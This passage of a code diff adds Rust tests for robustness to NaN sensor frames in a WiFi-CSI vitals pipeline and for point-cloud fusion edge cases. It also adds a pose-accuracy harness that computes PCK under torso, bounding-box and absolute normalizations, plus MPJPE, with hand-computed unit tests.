assert_eq!(grid.rows, 2);
|
||||
assert!(
|
||||
grid.cell_size_deg.is_finite() && grid.cell_size_deg > 0.0,
|
||||
"cell_size must be finite positive, got {}",
|
||||
grid.cell_size_deg
|
||||
);
|
||||
}
|
||||
}
|
||||
|
||||
@@ -700,4 +700,79 @@ mod tests {
|
||||
assert!(conf > 0.7, "self-similarity should exceed match threshold");
|
||||
}
|
||||
}
|
||||
|
||||
// ── NaN-state-poisoning guard (the proven recurring bug class) ──────────
|
||||
//
|
||||
// The calibration/vitals crates were both bitten by a single non-finite
|
||||
// sample latching into persistent state and freezing all outputs forever.
|
||||
// Here the auto-accumulating persistent state is `occupancy` (an EMA:
|
||||
// `*occ = *occ*0.7 + new*0.3`) and `vitals` (motion/breathing/heart).
|
||||
//
|
||||
// The UDP parser can only ever emit finite amplitudes/phases (sqrt and
|
||||
// atan2 of i8 values), so the realistic ingress is already safe. This test
|
||||
// is stronger: it injects an adversarial hand-built `CsiFrame` carrying
|
||||
// NaN/inf amplitudes and phases (possible because the fields are public),
|
||||
// and pins that the persistent state self-heals to finite values rather
|
||||
// than latching NaN and silently freezing — i.e. the bug class is absent.
|
||||
#[test]
|
||||
fn nonfinite_frame_does_not_poison_persistent_state() {
|
||||
let mut s = CsiPipelineState::default();
|
||||
// Warm up with valid frames so vitals/occupancy are populated.
|
||||
seed_state_with_frames(&mut s, 60);
|
||||
|
||||
// A valid baseline must be finite to start.
|
||||
assert!(s.occupancy.iter().all(|d| d.is_finite()));
|
||||
assert!(s.vitals.breathing_rate.is_finite());
|
||||
assert!(s.vitals.motion_score.is_finite());
|
||||
|
||||
// Inject a stream of poisoned frames: NaN/inf amplitudes + phases on a
|
||||
// valid header (node_id 1, finite rssi). Mimics a corrupt sensor.
|
||||
for i in 0..40 {
|
||||
let nan_frame = CsiFrame {
|
||||
node_id: 1,
|
||||
n_antennas: 1,
|
||||
n_subcarriers: 32,
|
||||
channel: 6,
|
||||
rssi: -50,
|
||||
noise_floor: -90,
|
||||
timestamp_us: 10_000 + i,
|
||||
iq_data: vec![0i8; 64],
|
||||
amplitudes: vec![f32::NAN; 32],
|
||||
phases: vec![f32::INFINITY; 32],
|
||||
};
|
||||
s.process_frame(nan_frame);
|
||||
}
|
||||
|
||||
// Persistent auto-accumulating state must remain finite — a single
|
||||
// poisoned frame (or 40) must not permanently corrupt outputs.
|
||||
assert!(
|
||||
s.occupancy.iter().all(|d| d.is_finite()),
|
||||
"occupancy EMA must not latch NaN/inf"
|
||||
);
|
||||
assert!(
|
||||
s.vitals.breathing_rate.is_finite(),
|
||||
"breathing_rate must stay finite, got {}",
|
||||
s.vitals.breathing_rate
|
||||
);
|
||||
assert!(
|
||||
s.vitals.heart_rate.is_finite(),
|
||||
"heart_rate must stay finite, got {}",
|
||||
s.vitals.heart_rate
|
||||
);
|
||||
assert!(
|
||||
s.vitals.motion_score.is_finite(),
|
||||
"motion_score must stay finite, got {}",
|
||||
s.vitals.motion_score
|
||||
);
|
||||
|
||||
// And the pipeline must recover: feeding valid frames again yields a
|
||||
// finite, in-range breathing estimate (not a frozen NaN).
|
||||
seed_state_with_frames(&mut s, 60);
|
||||
assert!(s.vitals.breathing_rate.is_finite());
|
||||
assert!(
|
||||
(0.0..=40.0).contains(&s.vitals.breathing_rate),
|
||||
"breathing must be in clamp range after recovery, got {}",
|
||||
s.vitals.breathing_rate
|
||||
);
|
||||
}
|
||||
}
|
||||
|
||||
@@ -184,4 +184,43 @@ mod tests {
|
||||
let fused = fuse_clouds(&[&a], 0.5);
|
||||
assert_eq!(fused.points.len(), 1, "three close points → one voxel");
|
||||
}
|
||||
|
||||
// ── degenerate-input robustness (no panic, sensible output) ────────────
|
||||
//
|
||||
// These pin that the voxel accumulators handle empty / single / all-
|
||||
// coincident inputs without dividing by zero or panicking. The per-voxel
|
||||
// count is always >= 1 (the entry is created on first insert), so the
|
||||
// `/n` averaging is safe — but make that contract explicit so a future
|
||||
// refactor cannot silently reintroduce a div-by-zero.
|
||||
|
||||
#[test]
|
||||
fn fuse_clouds_empty_input_is_empty() {
|
||||
let fused = fuse_clouds(&[], 0.1);
|
||||
assert!(fused.points.is_empty(), "no clouds → no points");
|
||||
let empty = PointCloud::new("empty");
|
||||
let fused2 = fuse_clouds(&[&empty], 0.1);
|
||||
assert!(fused2.points.is_empty(), "empty cloud → no points");
|
||||
}
|
||||
|
||||
#[test]
|
||||
fn fuse_clouds_single_point_is_finite() {
|
||||
let a = cloud_with("a", &[(1.0, 2.0, 3.0)]);
|
||||
let fused = fuse_clouds(&[&a], 0.1);
|
||||
assert_eq!(fused.points.len(), 1);
|
||||
let p = &fused.points[0];
|
||||
assert!(
|
||||
p.x.is_finite() && p.y.is_finite() && p.z.is_finite() && p.intensity.is_finite(),
|
||||
"single-point voxel must average to a finite point"
|
||||
);
|
||||
}
|
||||
|
||||
#[test]
|
||||
fn fuse_clouds_all_coincident_collapses_finite() {
|
||||
// Many identical points → one voxel, finite averaged centroid.
|
||||
let a = cloud_with("a", &[(0.5, 0.5, 0.5); 100]);
|
||||
let fused = fuse_clouds(&[&a], 0.25);
|
||||
assert_eq!(fused.points.len(), 1, "coincident points → one voxel");
|
||||
let p = &fused.points[0];
|
||||
assert!((p.x - 0.5).abs() < 1e-4 && p.x.is_finite());
|
||||
}
|
||||
}
|
||||
|
||||
@@ -0,0 +1,708 @@
|
||||
//! Metric-locked pose-accuracy harness (ADR-155 §Tier-1.2; needs ADR slot 173).
|
||||
//!
|
||||
//! # Why this module exists
|
||||
//!
|
||||
//! Three PCK\@20 numbers float around this project and **cannot be lined up**
|
||||
//! because each silently uses a *different* PCK definition:
|
||||
//!
|
||||
//! | Number | Source | PCK normalization |
|
||||
//! |--------|--------|-------------------|
|
||||
//! | 96.09 % | WiFlow-STD reproduction | image / bounding-box normalized (looser) |
|
||||
//! | 81.63 % | AetherArena MM-Fi (ADR-150) | torso-diameter (standard MM-Fi / GraphPose-Fi) |
|
||||
//! | 61.1 % | GraphPose-Fi (preprint) | torso-diameter, 3D, mm-scale (harder) |
|
||||
//!
|
||||
//! The project was burned **twice** by metric ambiguity (a now-retracted "92.9 %
|
||||
//! PCK\@20" used *absolute* pixel thresholds, not torso normalization). The fix
|
||||
//! is to make the normalizer **explicit, selectable, and carried with every
|
||||
//! reported number** so an unlabeled PCK figure is structurally impossible.
|
||||
//!
|
||||
//! [`metrics_core`](crate::metrics_core) already pins the *canonical*
|
||||
//! torso-normalized PCK ([`pck_canonical`](crate::metrics_core::pck_canonical)).
|
||||
//! This module generalizes it to a [`PckNormalization`] enum covering all three
|
||||
//! conventions the SOTA brief names, adds [`mpjpe`] (mm), and bundles results
|
||||
//! into a self-describing [`PoseAccuracy`] struct. It **reuses** the
|
||||
//! `metrics_core` primitives (hip distance, bounding-box diagonal) — there is
|
||||
//! still exactly one implementation of each geometric reference.
|
||||
//!
|
||||
//! # This is measurement infrastructure, not an accuracy claim
|
||||
//!
|
||||
//! Nothing here asserts any project model is good. The unit tests prove the
|
||||
//! *harness* is arithmetically correct against hand-computed fixtures (no GPU,
|
||||
//! no datasets), including the key demonstration that the **same predictions
|
||||
//! score different PCK under the three normalizations** — proof the ambiguity is
|
||||
//! real and the definitions are genuinely distinct.
|
||||
//!
|
||||
//! # Literature
|
||||
//!
|
||||
//! - Torso-diameter PCK is the MM-Fi / GraphPose-Fi convention (Yang et al.,
|
||||
//! *GraphPose-Fi*, arXiv:2511.19105): a keypoint is correct iff its error is
|
||||
//! within `k · d_torso`, with `d_torso` the hip↔hip (or shoulder↔hip) span.
|
||||
//! - Bounding-box / image-normalized PCK is the WiFlow-STD-style looser
|
||||
//! convention (arXiv:2602.08661) — normalize by the GT pose bbox diagonal.
|
||||
//! - MPJPE (mean per-joint position error, mm) is reported by GraphPose-Fi and
|
||||
//! Person-in-WiFi-3D (Yan et al., CVPR 2024).
|
||||
|
||||
use std::collections::BTreeMap;
|
||||
|
||||
use ndarray::{Array1, Array2};
|
||||
|
||||
use crate::metrics_core::{
|
||||
bounding_box_diagonal, CANON_LEFT_HIP, CANON_RIGHT_HIP,
|
||||
};
|
||||
|
||||
/// Visibility cutoff: a keypoint counts as *visible* iff `visibility[j] >= 0.5`
|
||||
/// (COCO convention; matches [`crate::metrics_core`]).
|
||||
const VISIBILITY_THRESHOLD: f32 = 0.5;
|
||||
|
||||
/// Minimum positive normalizer extent. Below this the reference scale is
|
||||
/// considered degenerate (zero torso, collapsed bbox) and the frame is reported
|
||||
/// unscoreable rather than dividing by ≈0.
|
||||
const MIN_REFERENCE_EXTENT: f32 = 1e-6;
|
||||
|
||||
// ===========================================================================
|
||||
// PCK normalization — the explicit, selectable definition
|
||||
// ===========================================================================
|
||||
|
||||
/// The PCK normalization basis — **the single knob that made three project
|
||||
/// numbers non-comparable**, now explicit and carried with every result.
|
||||
///
|
||||
/// A keypoint `j` (with `visibility[j] >= 0.5`) is *correct* iff
|
||||
/// `‖pred_j − gt_j‖₂ ≤ τ`, where the **distance tolerance `τ`** is derived from
|
||||
/// the chosen normalization and the PCK threshold `k` (given as a percentage,
|
||||
/// e.g. `20` for PCK\@20):
|
||||
///
|
||||
/// | Variant | `τ` (tolerance in coordinate units) |
|
||||
/// |---------|--------------------------------------|
|
||||
/// | [`TorsoDiameter`](Self::TorsoDiameter) | `(k/100) · d_torso` |
|
||||
/// | [`BoundingBoxDiagonal`](Self::BoundingBoxDiagonal) | `(k/100) · d_bbox` |
|
||||
/// | [`AbsolutePixels`](Self::AbsolutePixels) | `threshold` (k ignored) |
|
||||
///
|
||||
/// `d_torso` is the hip↔hip span (COCO joints 11↔12), falling back to the bbox
|
||||
/// diagonal when both hips are not visible — identical to
|
||||
/// [`crate::metrics_core::canonical_torso_size`]. `d_bbox` is the diagonal of
|
||||
/// the axis-aligned bounding box of all visible GT keypoints.
|
||||
///
|
||||
/// These yield **different** PCK on the *same* predictions whenever
|
||||
/// `d_torso ≠ d_bbox` (always true for a real pose: the bbox is larger than the
|
||||
/// hip span), which is exactly why the 96 / 81.6 / 61 numbers cannot be lined
|
||||
/// up without declaring this enum.
|
||||
#[derive(Debug, Clone, Copy, PartialEq)]
|
||||
pub enum PckNormalization {
|
||||
/// **Torso-diameter** (hip↔hip span). The standard MM-Fi / GraphPose-Fi
|
||||
/// convention and the *stricter* of the two relative normalizers. This is
|
||||
/// the canonical default ([`crate::metrics_core::pck_canonical`]).
|
||||
TorsoDiameter,
|
||||
/// **Bounding-box diagonal** (a.k.a. image-normalized). The looser
|
||||
/// WiFlow-STD-style convention: normalize by the GT pose bbox diagonal,
|
||||
/// which is larger than the torso span ⇒ a more forgiving threshold ⇒ a
|
||||
/// higher PCK on identical predictions.
|
||||
BoundingBoxDiagonal,
|
||||
/// **Absolute pixel/coordinate threshold** — no pose-relative
|
||||
/// normalization. The PCK `k` percentage is ignored; the held `threshold`
|
||||
/// is the raw distance tolerance directly. Included so historical
|
||||
/// retracted-style numbers are reproducible, and **clearly labeled as
|
||||
/// non-comparable** to the relative variants (it does not scale with body
|
||||
/// size or camera distance).
|
||||
AbsolutePixels(f32),
|
||||
}
|
||||
|
||||
impl PckNormalization {
|
||||
/// Human-readable, *self-documenting* label for a reported number — so a
|
||||
/// `PoseAccuracy` printed anywhere always carries its definition.
|
||||
pub fn label(&self) -> String {
|
||||
match self {
|
||||
PckNormalization::TorsoDiameter => "torso-diameter".to_string(),
|
||||
PckNormalization::BoundingBoxDiagonal => "bbox-diagonal".to_string(),
|
||||
PckNormalization::AbsolutePixels(t) => format!("absolute-px({t})"),
|
||||
}
|
||||
}
|
||||
|
||||
/// Compute the per-frame distance tolerance `τ` for PCK threshold `k`
|
||||
/// (percentage). Returns `None` when the (relative) normalizer is degenerate
|
||||
/// — the frame cannot be scored.
|
||||
///
|
||||
/// `gt_kpts` is `[n, 2]` (or `[n, ≥2]`, only x/y used); `visibility` is `[n]`.
|
||||
fn tolerance(&self, gt_kpts: &Array2<f32>, visibility: &Array1<f32>, k: u8) -> Option<f32> {
|
||||
let n = gt_kpts.shape()[0].min(visibility.len());
|
||||
match self {
|
||||
PckNormalization::AbsolutePixels(threshold) => {
|
||||
// Raw tolerance, independent of pose scale and of `k`.
|
||||
if *threshold > 0.0 {
|
||||
Some(*threshold)
|
||||
} else {
|
||||
None
|
||||
}
|
||||
}
|
||||
PckNormalization::TorsoDiameter => {
|
||||
let d = torso_diameter(gt_kpts, visibility, n)?;
|
||||
Some((k as f32 / 100.0) * d)
|
||||
}
|
||||
PckNormalization::BoundingBoxDiagonal => {
|
||||
let d = bounding_box_diagonal(gt_kpts, visibility, n);
|
||||
if d > MIN_REFERENCE_EXTENT {
|
||||
Some((k as f32 / 100.0) * d)
|
||||
} else {
|
||||
None
|
||||
}
|
||||
}
|
||||
}
|
||||
}
|
||||
}
|
||||
|
||||
/// Hip↔hip torso diameter with a bbox-diagonal fallback — the relative
|
||||
/// normalizer shared by `TorsoDiameter` PCK and
|
||||
/// [`crate::metrics_core::canonical_torso_size`]. Returns `None` when no
|
||||
/// positive-extent reference exists.
|
||||
fn torso_diameter(gt_kpts: &Array2<f32>, visibility: &Array1<f32>, n: usize) -> Option<f32> {
|
||||
if CANON_LEFT_HIP < n
|
||||
&& CANON_RIGHT_HIP < n
|
||||
&& visibility[CANON_LEFT_HIP] >= VISIBILITY_THRESHOLD
|
||||
&& visibility[CANON_RIGHT_HIP] >= VISIBILITY_THRESHOLD
|
||||
{
|
||||
let dx = gt_kpts[[CANON_LEFT_HIP, 0]] - gt_kpts[[CANON_RIGHT_HIP, 0]];
|
||||
let dy = gt_kpts[[CANON_LEFT_HIP, 1]] - gt_kpts[[CANON_RIGHT_HIP, 1]];
|
||||
let torso = (dx * dx + dy * dy).sqrt();
|
||||
if torso > MIN_REFERENCE_EXTENT {
|
||||
return Some(torso);
|
||||
}
|
||||
}
|
||||
let diag = bounding_box_diagonal(gt_kpts, visibility, n);
|
||||
if diag > MIN_REFERENCE_EXTENT {
|
||||
Some(diag)
|
||||
} else {
|
||||
None
|
||||
}
|
||||
}
|
||||
|
||||
// ===========================================================================
|
||||
// Single-frame PCK / MPJPE
|
||||
// ===========================================================================
|
||||
|
||||
/// Per-frame **PCK\@`k`** under the selected `normalization`.
|
||||
///
|
||||
/// A keypoint `j` with `visibility[j] >= 0.5` is correct iff
|
||||
/// `‖pred_j − gt_j‖₂ ≤ τ`, with `τ` from
|
||||
/// [`PckNormalization::tolerance`]. Only x/y are used (2D PCK is the standard
|
||||
/// keypoint-PCK definition; pass 2-column arrays).
|
||||
///
|
||||
/// # Returns
|
||||
/// `(correct, total, pck)` with `pck ∈ [0,1]`. **`(0, 0, 0.0)`** when no
|
||||
/// keypoint is visible, or (for the relative normalizers) the reference scale is
|
||||
/// degenerate — a frame with no measurable evidence scores 0, never 1.
|
||||
/// NaN-valued coordinates make a keypoint *incorrect* (the `<=` comparison is
|
||||
/// false for NaN) rather than panicking.
|
||||
pub fn pck_at(
|
||||
pred_kpts: &Array2<f32>,
|
||||
gt_kpts: &Array2<f32>,
|
||||
visibility: &Array1<f32>,
|
||||
k: u8,
|
||||
normalization: PckNormalization,
|
||||
) -> (usize, usize, f32) {
|
||||
let n = pred_kpts.shape()[0]
|
||||
.min(gt_kpts.shape()[0])
|
||||
.min(visibility.len());
|
||||
let tol = match normalization.tolerance(gt_kpts, visibility, k) {
|
||||
Some(t) => t,
|
||||
None => return (0, 0, 0.0),
|
||||
};
|
||||
|
||||
let mut correct = 0usize;
|
||||
let mut total = 0usize;
|
||||
for j in 0..n {
|
||||
if visibility[j] < VISIBILITY_THRESHOLD {
|
||||
continue;
|
||||
}
|
||||
total += 1;
|
||||
let dx = pred_kpts[[j, 0]] - gt_kpts[[j, 0]];
|
||||
let dy = pred_kpts[[j, 1]] - gt_kpts[[j, 1]];
|
||||
let dist = (dx * dx + dy * dy).sqrt();
|
||||
// NaN-safe: `NaN <= tol` is false, so a NaN coordinate counts as wrong.
|
||||
if dist <= tol {
|
||||
correct += 1;
|
||||
}
|
||||
}
|
||||
let pck = if total > 0 {
|
||||
correct as f32 / total as f32
|
||||
} else {
|
||||
0.0
|
||||
};
|
||||
(correct, total, pck)
|
||||
}
|
||||
|
||||
/// Per-frame **MPJPE** (mean per-joint position error) over visible keypoints,
|
||||
/// in the coordinate units of the inputs (report as mm when inputs are mm).
|
||||
///
|
||||
/// `pred`/`gt` are `[n, D]` with `D ∈ {2, 3}` (2D or 3D pose); all `D` columns
|
||||
/// are used. Joints with `visibility[j] < 0.5` are excluded.
|
||||
///
|
||||
/// Returns `0.0` when no keypoint is visible (no evidence). A NaN coordinate
|
||||
/// propagates into the returned mean (callers filter NaN frames upstream); it
|
||||
/// does not panic.
|
||||
pub fn mpjpe(pred: &Array2<f32>, gt: &Array2<f32>, visibility: &Array1<f32>) -> f32 {
|
||||
let n = pred.shape()[0].min(gt.shape()[0]).min(visibility.len());
|
||||
let d = pred.shape()[1].min(gt.shape()[1]);
|
||||
let mut sum = 0.0f32;
|
||||
let mut count = 0usize;
|
||||
for j in 0..n {
|
||||
if visibility[j] < VISIBILITY_THRESHOLD {
|
||||
continue;
|
||||
}
|
||||
let mut sq = 0.0f32;
|
||||
for c in 0..d {
|
||||
let diff = pred[[j, c]] - gt[[j, c]];
|
||||
sq += diff * diff;
|
||||
}
|
||||
sum += sq.sqrt();
|
||||
count += 1;
|
||||
}
|
||||
if count > 0 {
|
||||
sum / count as f32
|
||||
} else {
|
||||
0.0
|
||||
}
|
||||
}
|
||||
|
||||
// ===========================================================================
|
||||
// Self-describing result struct + batch report
|
||||
// ===========================================================================
|
||||
|
||||
/// A pose-accuracy result that **always carries the definition it was computed
|
||||
/// under** — making an unlabeled PCK number structurally impossible.
|
||||
///
|
||||
/// Built by [`accuracy_report`] over a set of frames. `pck_at` maps each
|
||||
/// requested threshold `k` (percentage, e.g. `20`) to its PCK in `[0,1]`. The
|
||||
/// `normalization` field records *which* PCK definition produced those numbers,
|
||||
/// so two `PoseAccuracy` values can only be compared when their `normalization`
|
||||
/// matches (the comparability check the project lacked).
|
||||
#[derive(Debug, Clone, PartialEq)]
|
||||
pub struct PoseAccuracy {
|
||||
/// PCK\@k for each requested threshold percentage `k`, in `[0,1]`.
|
||||
pub pck_at: BTreeMap<u8, f32>,
|
||||
/// Mean per-joint position error in coordinate units (mm for mm inputs).
|
||||
pub mpjpe: f32,
|
||||
/// The normalization basis under which `pck_at` was computed — the label a
|
||||
/// reported number must always carry.
|
||||
pub normalization: PckNormalization,
|
||||
/// Number of keypoints per frame (the pose convention, e.g. 17 for COCO).
|
||||
pub n_keypoints: usize,
|
||||
/// Number of frames aggregated into this result.
|
||||
pub n_frames: usize,
|
||||
}
|
||||
|
||||
impl PoseAccuracy {
|
||||
/// Convenience accessor for a single threshold, returning `None` when that
|
||||
/// `k` was not requested.
|
||||
pub fn pck(&self, k: u8) -> Option<f32> {
|
||||
self.pck_at.get(&k).copied()
|
||||
}
|
||||
|
||||
/// A one-line, self-documenting summary suitable for logs / RESULTS.md, e.g.
|
||||
/// `PCK@20=0.750 (torso-diameter, 17kp, 1 frames) MPJPE=0.030`.
|
||||
pub fn summary(&self) -> String {
|
||||
let pcks: Vec<String> = self
|
||||
.pck_at
|
||||
.iter()
|
||||
.map(|(k, v)| format!("PCK@{k}={v:.3}"))
|
||||
.collect();
|
||||
format!(
|
||||
"{} ({}, {}kp, {} frames) MPJPE={:.4}",
|
||||
pcks.join(" "),
|
||||
self.normalization.label(),
|
||||
self.n_keypoints,
|
||||
self.n_frames,
|
||||
self.mpjpe
|
||||
)
|
||||
}
|
||||
}
|
||||
|
||||
/// One frame's prediction + ground truth + visibility for batch scoring.
|
||||
///
|
||||
/// All three arrays share row count `n_keypoints`; `pred`/`gt` are `[n, D]`
|
||||
/// (`D ∈ {2,3}`), `visibility` is `[n]`.
|
||||
#[derive(Debug, Clone)]
|
||||
pub struct PoseFrame {
|
||||
/// Predicted keypoints `[n, D]`.
|
||||
pub pred: Array2<f32>,
|
||||
/// Ground-truth keypoints `[n, D]`.
|
||||
pub gt: Array2<f32>,
|
||||
/// Per-keypoint visibility `[n]` (`>= 0.5` ⇒ visible).
|
||||
pub visibility: Array1<f32>,
|
||||
}
|
||||
|
||||
/// Aggregate [`PoseAccuracy`] over a batch of frames under **one** explicit
|
||||
/// `normalization`, for the requested PCK thresholds `ks` (percentages).
|
||||
///
|
||||
/// PCK is micro-averaged over keypoints (sum of correct ÷ sum of visible across
|
||||
/// all frames — the standard keypoint-PCK aggregation), so frames with more
|
||||
/// visible joints contribute proportionally. MPJPE is micro-averaged over
|
||||
/// visible joints likewise. Unscoreable frames (no visible joints, degenerate
|
||||
/// relative normalizer) contribute `(0, 0)` and so are excluded from the
|
||||
/// denominator rather than scored as perfect.
|
||||
///
|
||||
/// An **empty** `frames` slice yields all-zero PCK and `0.0` MPJPE — never a
|
||||
/// panic or NaN.
|
||||
pub fn accuracy_report(
|
||||
frames: &[PoseFrame],
|
||||
ks: &[u8],
|
||||
normalization: PckNormalization,
|
||||
) -> PoseAccuracy {
|
||||
let n_keypoints = frames.first().map(|f| f.gt.shape()[0]).unwrap_or(0);
|
||||
|
||||
// PCK: per-threshold (correct, total) accumulators across frames.
|
||||
let mut pck_acc: BTreeMap<u8, (usize, usize)> = ks.iter().map(|&k| (k, (0, 0))).collect();
|
||||
// MPJPE: sum of per-joint distances and visible-joint count.
|
||||
let mut mpjpe_sum = 0.0f32;
|
||||
let mut mpjpe_count = 0usize;
|
||||
|
||||
for frame in frames {
|
||||
for &k in ks {
|
||||
let (c, t, _) = pck_at(&frame.pred, &frame.gt, &frame.visibility, k, normalization);
|
||||
let entry = pck_acc.entry(k).or_insert((0, 0));
|
||||
entry.0 += c;
|
||||
entry.1 += t;
|
||||
}
|
||||
// Per-frame MPJPE re-derived as a (sum, count) contribution so the
|
||||
// batch value is a true micro-average over joints.
|
||||
let n = frame.pred.shape()[0].min(frame.gt.shape()[0]).min(frame.visibility.len());
|
||||
let d = frame.pred.shape()[1].min(frame.gt.shape()[1]);
|
||||
for j in 0..n {
|
||||
if frame.visibility[j] < VISIBILITY_THRESHOLD {
|
||||
continue;
|
||||
}
|
||||
let mut sq = 0.0f32;
|
||||
for c in 0..d {
|
||||
let diff = frame.pred[[j, c]] - frame.gt[[j, c]];
|
||||
sq += diff * diff;
|
||||
}
|
||||
mpjpe_sum += sq.sqrt();
|
||||
mpjpe_count += 1;
|
||||
}
|
||||
}
|
||||
|
||||
let pck_at: BTreeMap<u8, f32> = pck_acc
|
||||
.into_iter()
|
||||
.map(|(k, (c, t))| {
|
||||
let v = if t > 0 { c as f32 / t as f32 } else { 0.0 };
|
||||
(k, v)
|
||||
})
|
||||
.collect();
|
||||
|
||||
let mpjpe = if mpjpe_count > 0 {
|
||||
mpjpe_sum / mpjpe_count as f32
|
||||
} else {
|
||||
0.0
|
||||
};
|
||||
|
||||
PoseAccuracy {
|
||||
pck_at,
|
||||
mpjpe,
|
||||
normalization,
|
||||
n_keypoints,
|
||||
n_frames: frames.len(),
|
||||
}
|
||||
}
|
||||
|
||||
#[cfg(test)]
|
||||
mod tests {
|
||||
use super::*;
|
||||
|
||||
/// Build a 17-joint `[17, 2]` pose from `(joint, x, y)` triples.
|
||||
fn pose17(joints: &[(usize, f32, f32)]) -> Array2<f32> {
|
||||
let mut a = Array2::<f32>::zeros((17, 2));
|
||||
for &(j, x, y) in joints {
|
||||
a[[j, 0]] = x;
|
||||
a[[j, 1]] = y;
|
||||
}
|
||||
a
|
||||
}
|
||||
|
||||
fn vis17(visible: &[usize]) -> Array1<f32> {
|
||||
let mut v = Array1::<f32>::zeros(17);
|
||||
for &j in visible {
|
||||
v[j] = 2.0;
|
||||
}
|
||||
v
|
||||
}
|
||||
|
||||
// -------- consts pinned (no silent metric drift) --------
|
||||
#[test]
|
||||
fn accuracy_consts_unchanged() {
|
||||
assert_eq!(VISIBILITY_THRESHOLD, 0.5_f32);
|
||||
assert_eq!(MIN_REFERENCE_EXTENT, 1e-6_f32);
|
||||
}
|
||||
|
||||
// -------- perfect prediction ⇒ PCK = 1.0, MPJPE = 0 --------
|
||||
#[test]
|
||||
fn perfect_prediction_pck_one_mpjpe_zero() {
|
||||
let gt = pose17(&[
|
||||
(5, 0.35, 0.35),
|
||||
(CANON_LEFT_HIP, 0.40, 0.50),
|
||||
(CANON_RIGHT_HIP, 0.60, 0.50),
|
||||
]);
|
||||
let vis = vis17(&[5, CANON_LEFT_HIP, CANON_RIGHT_HIP]);
|
||||
for norm in [
|
||||
PckNormalization::TorsoDiameter,
|
||||
PckNormalization::BoundingBoxDiagonal,
|
||||
PckNormalization::AbsolutePixels(0.01),
|
||||
] {
|
||||
let (c, t, pck) = pck_at(>, >, &vis, 20, norm);
|
||||
assert_eq!((c, t), (3, 3), "{norm:?}");
|
||||
assert!((pck - 1.0).abs() < 1e-6, "{norm:?} perfect PCK must be 1.0");
|
||||
}
|
||||
assert_eq!(mpjpe(>, >, &vis), 0.0);
|
||||
}
|
||||
|
||||
// -------- all keypoints just OUTSIDE threshold ⇒ PCK = 0.0 --------
|
||||
//
|
||||
// Hand calc (torso): hips at (0.40,0.50)/(0.60,0.50) ⇒ torso = 0.20.
|
||||
// threshold k=20 ⇒ τ = 0.20·0.20 = 0.04. Push every scored joint to an
|
||||
// error of 0.05 (> 0.04) ⇒ all wrong. To avoid the hips themselves being
|
||||
// "correct", we displace the hips too (their displaced positions still
|
||||
// define the torso from GT, which is unchanged).
|
||||
#[test]
|
||||
fn all_just_outside_threshold_pck_zero() {
|
||||
let gt = pose17(&[
|
||||
(5, 0.50, 0.50),
|
||||
(CANON_LEFT_HIP, 0.40, 0.50),
|
||||
(CANON_RIGHT_HIP, 0.60, 0.50),
|
||||
]);
|
||||
// GT torso = 0.20, τ@20 = 0.04. Displace each scored joint by dx=0.05.
|
||||
let pred = pose17(&[
|
||||
(5, 0.55, 0.50),
|
||||
(CANON_LEFT_HIP, 0.45, 0.50),
|
||||
(CANON_RIGHT_HIP, 0.65, 0.50),
|
||||
]);
|
||||
let vis = vis17(&[5, CANON_LEFT_HIP, CANON_RIGHT_HIP]);
|
||||
let (c, t, pck) = pck_at(&pred, >, &vis, 20, PckNormalization::TorsoDiameter);
|
||||
assert_eq!(t, 3);
|
||||
assert_eq!(c, 0, "all errors 0.05 > τ 0.04 ⇒ none correct");
|
||||
assert_eq!(pck, 0.0);
|
||||
}
|
||||
|
||||
// -------- half-in / half-out ⇒ PCK = 0.5 --------
|
||||
//
|
||||
// Hand calc (torso): torso = 0.20, τ@20 = 0.04. Four visible joints; two
|
||||
// exact (dist 0 ≤ 0.04, correct), two displaced 0.05 (> 0.04, wrong)
|
||||
// ⇒ 2/4 = 0.5.
|
||||
#[test]
|
||||
fn half_in_half_out_pck_half() {
|
||||
let gt = pose17(&[
|
||||
(0, 0.50, 0.20),
|
||||
(5, 0.50, 0.50),
|
||||
(CANON_LEFT_HIP, 0.40, 0.50),
|
||||
(CANON_RIGHT_HIP, 0.60, 0.50),
|
||||
]);
|
||||
let pred = pose17(&[
|
||||
(0, 0.50, 0.20), // exact ⇒ correct
|
||||
(5, 0.55, 0.50), // err 0.05 ⇒ wrong
|
||||
(CANON_LEFT_HIP, 0.40, 0.50), // exact ⇒ correct
|
||||
(CANON_RIGHT_HIP, 0.65, 0.50), // err 0.05 ⇒ wrong
|
||||
]);
|
||||
let vis = vis17(&[0, 5, CANON_LEFT_HIP, CANON_RIGHT_HIP]);
|
||||
let (c, t, pck) = pck_at(&pred, >, &vis, 20, PckNormalization::TorsoDiameter);
|
||||
assert_eq!((c, t), (2, 4));
|
||||
assert!((pck - 0.5).abs() < 1e-6, "expected 0.5, got {pck}");
|
||||
}
|
||||
|
||||
// -------- THE KEY PROOF: same predictions, three normalizations, three PCK --------
|
||||
//
|
||||
// One construction scored three ways. Hand calc:
|
||||
// GT: nose(0)=(0.50,0.10), l_sh(5)=(0.50,0.30),
|
||||
// l_hip(11)=(0.40,0.90), r_hip(12)=(0.60,0.90).
|
||||
// Visible = {0,5,11,12}, all four.
|
||||
// torso = |0.60-0.40| = 0.20 (hips, y equal).
|
||||
// bbox: x∈[0.40,0.60] (w=0.20), y∈[0.10,0.90] (h=0.80)
|
||||
// ⇒ diag = sqrt(0.20² + 0.80²) = sqrt(0.04+0.64)=sqrt(0.68)=0.8246…
|
||||
//
|
||||
// Pred errors (pure dx): nose 0.00, l_sh 0.10, l_hip 0.00, r_hip 0.00.
|
||||
// (Only joint 5 is displaced, by 0.10.)
|
||||
//
|
||||
// k = 20:
|
||||
// • Torso τ = 0.20·0.20 = 0.040 → joint5 err 0.10 > 0.040 ⇒ WRONG
|
||||
// ⇒ 3 correct / 4 = 0.75
|
||||
// • Bbox τ = 0.20·0.8246 = 0.16492 → joint5 err 0.10 ≤ 0.16492 ⇒ CORRECT
|
||||
// ⇒ 4 correct / 4 = 1.00
|
||||
// • Abs(0.05) τ = 0.05 → joint5 err 0.10 > 0.05 ⇒ WRONG
|
||||
// ⇒ 3 correct / 4 = 0.75 (same count as torso HERE by coincidence)
|
||||
//
|
||||
// To make ALL THREE differ, also test Abs(0.08): τ=0.08, joint5 0.10>0.08
|
||||
// ⇒ still 0.75. So we additionally displace nose by 0.06 (between 0.05 and
|
||||
// 0.08) to separate the two absolute thresholds — see below.
|
||||
#[test]
|
||||
fn three_normalizations_give_different_pck_on_identical_input() {
|
||||
let gt = pose17(&[
|
||||
(0, 0.50, 0.10), // nose
|
||||
(5, 0.50, 0.30), // left_shoulder
|
||||
(CANON_LEFT_HIP, 0.40, 0.90),
|
||||
(CANON_RIGHT_HIP, 0.60, 0.90),
|
||||
]);
|
||||
